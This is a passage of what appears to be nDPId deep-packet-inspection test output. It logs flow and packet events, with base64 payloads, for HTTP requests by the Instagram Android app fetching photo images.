{"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e15\/11386524_110257619317430_379513654_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1436720900690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900690,"pkt":"ABsv8H60QPMIw47hCABFAAE3v7dAAEAGS+vAqABnUlUauq1bAFCj1oFKfMvpWoAYDTz8dgAAAQEICgAD63JUYaBjR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExMzc5MTQ4XzE0NDkxMjAyMjg3NDUzMTZfNjA3NDc3OTYyX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1lLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} 
-00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1436720900692,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900692,"pkt":"ABsv8H60QPMIw47hCABFAAE3iBFAAEAGg5LAqABnUlUaueJtAFAE8EMOWjfyZYAYD+bdMQAAAQEICgAD63JZ6ogYR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExNDI0NjIzXzE2MDgxNjMxMDk0NTA0MjFfNjYzMzE1ODgzX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1mLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
-02377{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1436720900716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900716,"pkt":"QPMIw47hABsv8H60CABFAAW+uH1AADkGTewuIUagwKgAZwBQl6CnSNXfj\/UmaIAQAiku5gAAAQEICprfPdsAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjU3OjA4IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTUwMDMxDQpDYWNoZS1Db250cm9sOiBuby10cmFuc2Zvcm0sIG1heC1hZ2U9MTIwOTYwMA0KRXhwaXJlczogU3VuLCAyNiBKdWwgMjAxNSAxNzowODoyMCBHTVQNCkRhdGU6IFN1biwgMTIgSnVsIDIwMTUgMTc6MDg6MjAgR01UDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDBjMzQ3MDAwMDEzNjQwMDAwNjM4NDAwMDA4MzJiMDEwMDBiODUwMTAwODdkZjAxMDAwZDRhMDIwMDlkYTIwMjAwNzY3MzAzMDAA\/9sAQwAGBgYGBgYLBgYLEAsLCxAVEBAQEBUbFRUVFRUbIBsbGxsbGyAgICAgICAgJycnJycnLS0tLS0zMzMzMzMzMzMz\/9sAQwEICAgNDA0WDAwWNSQeJDU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1\/8IAEQgEDwQPAwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAUBAgMEBgAHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAANnYrv6OWePnpwvl4Ucr5ZqutmsxzGNFZbBKECWI2oX8gp+rqOdscgJarTJrPTiAtUZEnHz0qOljcEskD1c01Rksi2ko7C10FaSJqLDY0bkkglRK+J01IqIm99eIL6jmheWgjCKVJUTsjcmxJXNVG3K1KNr3irtvMCithKVbraoq9cQKb5mse+vydpRzhEXinDIvFyoIspSDsdW4LfVORbSFGS9z0Q07Vapihe24SRFCV8D5p7U4fInJNSacY9CnDoLekTpOusTppdQVRUWk5Z3S6nSOaiisOZWrWqtSjFjqVjcxzA+ktxbdV5FmYfOO1PR5O6tOVN6dGCvruavqOenPG2AT0hWptvhfNzvglTijkaS2WB9FlYElvdXcE7qNkc6sYnO6nwWWwvB6cwHJ3BI+Pk7LqzU7SQPCRiRBzWw1M8o9Wr7h8yd2Yes0RUdMne6nInZbXUcjq0gpefEOw6FZdhsSpo1\/NNSRGRwz8KussbUKdHc9LXYK7JQkHbZE9CMRrLHVuCy6tIhIp+ajbOxDZOaN8kM6b52TRosiOmpWqktXN4fR9WcyxQQ3Mi1m1NxKzxO57gjldCOau1Guh6KocxG0s90jNuePlRqSaiqL7xrhlZBD1ROCogrq0VC86jwXI66CmfUcy84e5MlIKemSZ
RcnZWo5lqOCIVpafMuyjnIKtHOmrjanNWmV0at9VUdlavIty0UHfcNVBHhvASbQRlyCBWndG1xZlpvVXVpuTtPpPHelHPmiqjZJuxJVci8tKRVa6m0Lsg1QJNocO+lKMV1BqVN+Km1zbjrI1P1ZzUr6iNEZRL5ZRw56q6yDgmfWQLsg16ZNg3hkHi+ETQdInbdS4duCJorHU42r7hqMKoMQCnCeAuojkF0F8BRBzhkEpcFpK6im5sQ5GRJU57qi78tptbhTpBzLHQKE7qrwsdX4LS1+Ts9Uc1YWugWOruCfoFCwtRydla3CsLCo7DIlTl6FQm6BQnWuoT9DwSpCoS9DwTdA4JVrqE\/QKOx0ChM6u5EjoeCVY+ZIiIA="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1436720900717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900717,"pkt":"ABsv8H60QPMIw47hCABFAAA0wXFAAEAGQ4LAqABnLiFGoJegAFCP9SZop0jbaYAQH+o19wAAAQEICgAD63Sa3z3b"} -02375{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1436720900744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900744,"pkt":"QPMIw47hABsv8H60CABFAAW+u1hAADkGUttSVRqiwKgAZwBQ4lApkhzMOpIM7IAQAku18QAAAQEIClYLL1sAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjMyOjE3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTEyMjY4DQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA4OjIwIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AbFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABPHAIoAEpGQk1EMGYwMDA3NWIwMTAwMDBjZDFlMDAwMDUxNmQwMDAwYTY3YjAwMDBkMzhhMDAwMDQ3MTMwMTAwZDU4MDAxMDA4Y2I2MDEwMAD\/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT\/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT\/wgARCAKAAoADASIAAhEBAxEB\
/8QAHQAAAAYDAQAAAAAAAAAAAAAAAAECAwUGBAcICf\/EABsBAAIDAQEBAAAAAAAAAAAAAAABAgMEBQYH\/9oADAMBAAIQAxAAAADRJrP1fOIlpAgZgklAaSWREiWQ0hYBBKMG1GQ0mshINSQNKwDZqISVGBpCiEDBAlSiBIUY0GoAhRgEhRMIlm0hLpRTallISS1AgnEASgbEmowbUamIMzBKgaCCgBEs2NLM2INRiSFhiApTEksNJDhobBqHjA10yQHEiSSgCQoARGYJBhCQZgklkCTCgQThDSSzabMzAkuECSUY0gwJJmbEGogIGpiCWaEBSgbNRAk1hiCcJCDUGkGshpCjEkKVJthagbCzEgKMEmYAjNQICzaaWoAhZmxAUYIUZySQsAQcITZqJSxlGVMgDAJCwCUrCEBQYgwoEBQQkzAJBmxKXSBBmbEAGggowSlYBIcQJKloYRrJCQtLEmsASVhiA4kRGYGQUQkk4AQsEwgswbNZNESw2kzUk2awBJdKQg1KQ2ow0ROkNBOpEk1BhBZtEDMASgCCdCMMwuixAcIEBYE2HEjbNYBBOkNAUoSCWTaTCiKSWBthwkkBZAQUGINwDaCjkkhZobDgBCXDE0pYbQThobDiXEicJjalhNIMCSayBCjAEa0ySQ4QJNQYkzMCJYBBrMEEpQIDokIJwkIUoMSToBClAEGtQkEs0YClHRYk1pBIMwbNQYgnSYgLIEBwkICyYhS0tJCxFthwmkKMASVmhAWbEE4TSQsgIGpNBLIRBQaQayBJOAEBwMQFpAkukCQsAg1kwjMMCVgRGahtk4ASFmDYdSCQtbGjUbRJdAkBZDILMTalGxBqU0hLiYmGDXVNCjMaUrANmsIQlZttqUY2w4RFAcShClECQoCSlwmETgBsKNMgZsSTpAgKSIlGYICyESVkBBYBBqJog4E0E4TEB0gQHA00FqGlLhuKTNQINQJJJZgg1KY2ZpImFGNJLDSTWQIWFASXDBBg5BGoAgOEGEajpmg1hCCcIEEswQl5DSTM00EswQFATalGCCUYJJRg2oGCQsxoSswQow0lLgQhSgCDUGkBYEkOEDYdAIJZgk1ESQpQcUhRsSFGCQZgklgEmZg2pZyEBZgglmMiWQkhRgkOBoicSMiWbSDWGJNQBJOAMAKVVMgYiIUahNE4Y2wsNICwNCXUCIlmDRuGk2S1NsLUYIJwRbZrDSAo00GsmINQEkk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1436720900745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900745,"pkt":"ABsv8H60QPMIw47hCABFAAA00CZAAEAGPJfAqABnUlUaouJQAFA6kgzsKZIiVoAQH3QuLQAAAQEICgAD63dWCy9b"} 
-02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1436720900872,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900872,"pkt":"QPMIw47hABsv8H60CABFAAW+QeVAADkGzDdSVRq5wKgAZwBQ4m1aOHmGBPBEEYAQAktTqQAAAQEIClnq0tYAA+t6pEVxjNbEsTo05BJiqWC+y9Cm00IuBsqQ3OjXYmls3ooNNijoaA4JvaGXA6WBNFUSNxldWicRkqfSvQ+ysT9n0voZ+EyJR6Oy8JFg5mjiK3jhnpErGpjhG8skeRODdCdQ2MDy8miGRvQk1oSZFhVmGQ28jcag3sVEigomNJgo2R5DYnSdEiIuyPaJg2JvQlTQl7HH2PCFhjS9CYo0RCdlSaY2qVbA7SVlukMk60Nrou0FvVb7YyZLsTJUNNjXYcKjL2NNBHY6YRIqyEsm+g1byhIVtLCoTuULeROaIZSg30H1KXibE4I6MNQaNsuwl6EmkRW2hNPKHVGvY2h4LXCptXgsREUx4KkzYc6itsZrGceuCUwiNvZ0NlpU4bHVgOMeBQT+hXsW4NkxniYRKY0LOGPOuJ3wxvNY30XInTbyUHSrYx3BbGhCWhOLAjiZyQZFUJdjY3cIt4ZOkJvIlCy+hRiRG+RuPBllCy6VrIsIWMN5wEbUZGNRwXYxYMsCZvBM0SI+CRpDbsamyBbROyZoo8CJEl6E9mJ2S8EM3LEKN5FGYSlBs8UdkxmA2mpRC0zPZ7xJ9CwL8H7GJMEIRrTFqwKrYnyiJkSFrOodENU0wTGWNK2jlI9lfZlilokuhJLsxJCYIN4hejdRoOrIspMTJA01hjZUKPFINeESqCUMEQXvhWETJONsmi4g1wbPQfoNvgSpYMGCvY9YNIqvA3SQSmRLI4YPo2XNMYImYP1DY4jPgTTw2RtDTZj2bUhs0VbI6JdDjHkaG0not6KSwmmsQgk2Q2d8EY0NThbnDb6LikplbG2dZcC3WN4yZoyEhYNBej0BWx7I90tpJlyN42ZDbInnJ1C1j9i4ezDdGzUCRBRluhyJbIYWhtD6NOhqmcKFroh5EphFtxoj0LHA27N4EuzbHNiablHlZGpBOsMNmxNFXQsIyISmhtLI00bJ7F+j1S+jDRaWi3vmNnZe2dMzFsHjJciezaGpgnsUwLB9OsnZ3niE9jVXaWBDK2XAvaENk6N0ekQ2O9mkVid2JeCeikitCaY2qSMSexWxPhK4FBtCR+iXk7ssgLA2L0SCdTorMmVWF2XC0NTE0Jx1GuCltCJQTg1LLSyaM2UJLoSF6DFF9Mw9kaL7IKmI4MmxmzPiZWtisp9MNxiCdRNs2PYXFI7EHTI1SpITxUMwngXpkyZLmoTeRzsWCnZ+DfRVtifokzCxuYoykLQuIaLckmHw90WsHeOLnJ84eDeStIr0XApBloXsSFOuGxPJSo9D4JV5INNsaqEnFWmLKwNNiDhZETR+8N0hPQnDfQ9jUeRJC3L2abSUYrSyXKQvTLUJ0TMDXTG22NpLA+h7pbgbPbEFhURZQjQj9GNi+DZGcFGLsjYTTQlYRp28M2yQyxotDecoU0R2IEl2iJYG4illoT0E0yNMauOGKUSPA0mRrZpNHQ9mUtCe8LiDqwZ6FGTD0YCawPKG6VPR1B6om0oVtJszsT2oPLg1iChibE3sd6Emqj9QlcmEXhv
0J3fFLW0UaJbG7obENhs2LInSGhYWLA09oR2MwU2WaOiiYyFETeCZiGhtrYmeGRtwUYEs5HJsYE8FFhHQyA82YMmWhvJ+luERPJpCaXRrgavgriCd7HBcZJXUMHg9aNwpE0U5guCZyNlQ8sSjo1kSMsTUUFRQbOhYwhtnKP6SOXI1R12JOnuIeq2VMpZgm+hdg0iYglGUXsWqM1gbLTRccdQh6Ku0exnodIIyzBObLeyzRbgl2MPIvcF+DTaqR8HaG7s1kuabRjJ0TpPR2VPJV7KLKyJPRF0V2DRrKEZhaNsjpZo9uNoKHwaJdi0JwbUojVhqtMTJ4I0NdDcP0bBkIaxSOjsCQm08MyRGoPKyP2uPoVQ="} -02372{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1436720900873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900873,"pkt":"QPMIw47hABsv8H60CABFAAW+QeZAADkGzDZSVRq5wKgAZwBQ4m1aOH8QBPBEEYAQAktstgAAAQEIClnq0tgAA+t6yOoxEtjJYMe0j6G03geIuahaK1oTHsEliMMTZ8IV3w+jNLnJcKpRQYoNH0Q1owU7ElIg1BvY00M1sKh00GrYYaKmxapIfSuhKlliV5Ggz2ZEdUXqEuURYhcRmGdF6HkVYKkoGKmh3bGvRvDFLCRD9sysMedkSiftieCrscIysGDeGZuR52JNFJwy1gdIqmuE8SC43k2NNmXvnK0LZ7Q9kdYKlspkg9CZoqhXWJtbKpgafXBrJWhOsqdlcjGlMIf02UEyYUEoN\/R3BPJjY2bCG2s0iEvRRNQ+jO4xqKDwyI0ohahosjThi9BIrI7gehuDWUCCJLBXotaGI3Qlg0wJ4IVBKoTow2PA\/UqeR2ILqdQ62OGMraO4hekPhuNoceBSE3cCJmskaK+hP2IZK1kxs+D0NwaUQbYMYurNlQeMoTLYsrBUslTyTGB4bJjIpUh1Csyxlol2o3gucCaI7VzLkaJHRLOOI9DqwQy9GXvictCZRvBROF7M75lwMNqMbA1Q7yIm8GJWsFybGm8jbOi8hKnkr2M2jAtIEustYo61E\/YmmP6L0b3whJbGvRDYcGUzATfFIDVQIw2Oobux01kTo0N6FINdmGBYdKOUophoRJtodkbFVo9gsdiVGqholRuBaWjGKEmDKSSFXnjQZrsSagmHGQ2V6YSOqJlWjZkzB3BjS9mOWLBMSDwqGspicFTSY2vRnKTsOEJT6izJU3UzZMYLFNbFHhcKrhEElmjUHgsGw3eFliqL7LktKtGhuCzshGkdcMxokwNDSEy0x5WRazwkNsaY8bLNjG6JXCGsDRGmNiieYQKFSLNMh9GJBBqDcYmQ\/TLYs4Y5okeCCq6KrROsWRPA\/QgqexNDwJeyORUtLVhijncHacZgTImKglDuKPKPiNMVuBBPFGsVisByZlsa7HsdRZxjrKIyEiLkwMS2JuxPlJTJB8H6bZlkrSN1n4byX0J4EzWxRB5yNNiRbIpUIU6KJCXaHjR8G5KJ9CS9nWBuYG8YG6i9HshCfoTL7I9i9svs2S0igzvAmIqQvhrDHLkQf6KrgpKCatLEWjeRJbOsDeINKDg0ui5F0zaibWWN0bpi9BWZoEHKMpILVMCwVlji1gwwlSnhCVWC+iHqDPofxpWqTM0eNJ
2xqh8YRjmCGxosC24xO6HlDsYiabHsVY3Q2j8FwXDnhHTop2I0ZBKKmqh+g1MksMLJUzHQ4tCWBioqFxpAlEhOSDo8Dagmn2S4NI9pDj9P0qphlFmxt9ob7Q4fDeWdIS9mSomrgesCHk9xVyISbeBYZYqOnkRY6Qi+xNoTGi3wtcJ8IdEGuiiJs+CUCzHWBIwyehKjUWCjSYQ2xehJQkV4bmCDSE3ajpBI9MbbKsnYhMqSE6SoSmxVZQz7F7Cxw52a0Oi4wa6G80SyNISCZNs1kTWjAjbEjBSIX0JgVNEej4YLk6FUNkLSpOMieS4G8EdEeg2KpGUxUsEchDaYw1FYKjISLZtH5xdj6MjnZrR0KQaPJCYqtCpZNBN3Ym8GJNCRoeRqPAyVRi2Jvp8EoJ4hRsvRtEZTjFNsRZ6Lg1GM+iyL6KpBqRssXcg5w2Ui1l6HGqjFFnaPpYhNtEfI6Fk9p+jWy+h1jWBucKo6btHQ1cIbLY6jKwI1kTtCe6OF7GyQ+luTvB+OCeRZE8Cjzw\/QQ2lsbbGNL0REErSTiKuDRksFTw2JZIJTbY1oaZGzXwTzsbdEiLmog0Ji7YqmN+hroiag0PQeUVDI9mcQw6G101ZROVMQtGQ7eH6WaIbNDwsDsK10NpNDbcMrspisEOJISYYqTRU0RDqgVWGQxaXIsvmpFmWPDA8JDDqHRSQsC9DYnnBYhpbF9KmJvaYk7Ktm8jfrhZcJnL5r4twNjbk="} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720900692,"flow_last_seen":1436720900873,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":1031,"midstream":1,"thread_ts_msec":1436720900873,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
-02391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1436720900875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900875,"pkt":"QPMIw47hABsv8H60CABFAAW+G2lAADkG8rJSVRq6wKgAZwBQrVt8zLRbo9aCTYAQAxSDewAAAQEIClRjBa0AA+t+qDhdSVH1chUH1JtbCJY\/b9U\/35z\/AIcB2iAbyHujCEFNZ+I0eU8EOIX\/AEB\/qRwVo9Wlp5znKiVYRroroyxNdVdiE6kdYXRMS3KcwBs+EyuWZYuo52fCGCiRaGhDCm0eStltza5zDLVQe2oxt2qbSrdR5pHTZPJaAK7JTxSrekwfflKFROdJwg5Y1CyNVSaHSVxDS0CVTMOVI9v3UgC122i67XHxCfXa5p2RquKuPMJ1XpUxG6NIvp3blVKRpiVRMtCZ59+YOFU7DcnU6dTOhRpECHZCLSwomfujLIK9xojog5ZGQgQ5VGxza\/YotDtEQRr+RTZe72UhDK0U\/Sg+fuESn9pT0VTtKEFOlWOQYBlU6VNyNOjonUmH0p7LdOTSD6k6C1Oj5p\/wckoMOHKYPO3tlU9WFVKbrygB07fGU4txhOccQn+qSgN0CjqgJbEqm5ow5FksvA7VeZ7f3Tajd904VNW6JjQ5ncntFPTPhDtGVPjVZB91ncoRE8oIyp5N9S4cEODlVJp1JmA5fEBxtqYKqUOqP+\/zSg5U2tcI3K4r1W6whjKbVcNE4l2TyDtij7fIFHV4f3CoGWKuyWKj6ICHjmTYVF4grovG6HUCdTvzon0H6hVh+C1MMIt8ICE07KNwg+cFOZuEeTXFquDtU5vj5onCADRCuEIOGmi9bcI9qe6Hh\/lSnr\/LyBA0QtO6w38TUIwWwCvsgy3VFt7sqxzT7KwyZTqc5blYj3X06flx+dK1UrEqM45DARcbWwqkkymmJC+hEywLVAnRSFLZ0Uh2F02s75QrdN3lqFtZuO1OGwcuGqOAgqpFMWFAx6lcXdgGuiNNzYCtMzGE+FGJWdEJR5BUG9p91xTbqM+Ewy22pp5VKoaLu4\/b5BzCouE52V4uc5eoyu2IHzQgtMrhTPaqXY51NHLYVLteWrXnUbcEx1pUhytVgUIjzlVKH10\/2UhqqcmlOQfGqIDtF7I45NMpzflptJyiG\/dbyiJTaj6ZTiKrbmo5ZHhMMtRKf5RzypychE\/TsrBP6osiBO6jfYoVBq4Jz6ZGNEfUA7KqOaIsRYcFuUx8DCcaZ9QXSpu0cjw7\/pyoI1\/xGLV7rflJtjkMIOwg4rTVSeRlD3WuyIIAXoy5qI\/DENgr4jNzxlPqdUrUhEuZmFfdl26N8xOAjGpXr9KDMp\/b2cg5m4lf8u76E2rRtxKi+mQqYlpb4VNj\/S8YREfJPzBEfKCVMohcObXqr2Vg\/wAoZTxbXnyhp8j25QMIOKL0AdeU2PhcRSg3t3TXfS5FiaY1TvI5B0JrhqnsZU7giFog4OwU4cxkwtBCPLZaoE0nIgeoaJuJatkdORVDu7Toi3xGE7KLogHZdS37K7Ca7OUXI936Koe0CUDyCBTg2qId+6LS11rvzZ\/KZqoJ5brPLTlEqFoVKuOCobMhCqWm1Q6YKtduV+OT5hOoPnKDcL0EYwpFTRQ3Mp0GIELLsnZXv0CudC115sBLwAumQ2Vw7
vxLTo5VPwqxxKbWp7ynCfyJwpUrqNIh3yxATdVsqUmqFUZ1GLh3EiDsq7e27wm6IhBQnBQoTGSZPIhVh23eFh7IKLc2ldzcFEbpr9kfPNr\/ACqudEeV550hHepk45Bao6qoMSqTx6XJ4teObhypm39E24i9wQd3SVUI2TsnKnZXYgrJ0TO3ITjPIK5XJpVRvVb77f4WZ5M9QUG4hbcsrbkFK+3INkwoA7TsrTspB9WEa3bnXyu5xl6p1XUk6qXbo5gxgJ\/cwRsi0jVNBQLtxhXSSSnFzk4QMr6UQYley4MfidR2jVVqGpk4b48oVXdZrzsuNbkOCHDuPc7tHvycN\/ywOYTlupwuHbm9bJ3Y8P8AKIuCpnCBwsSgii1WocyEzwuKp4s="} 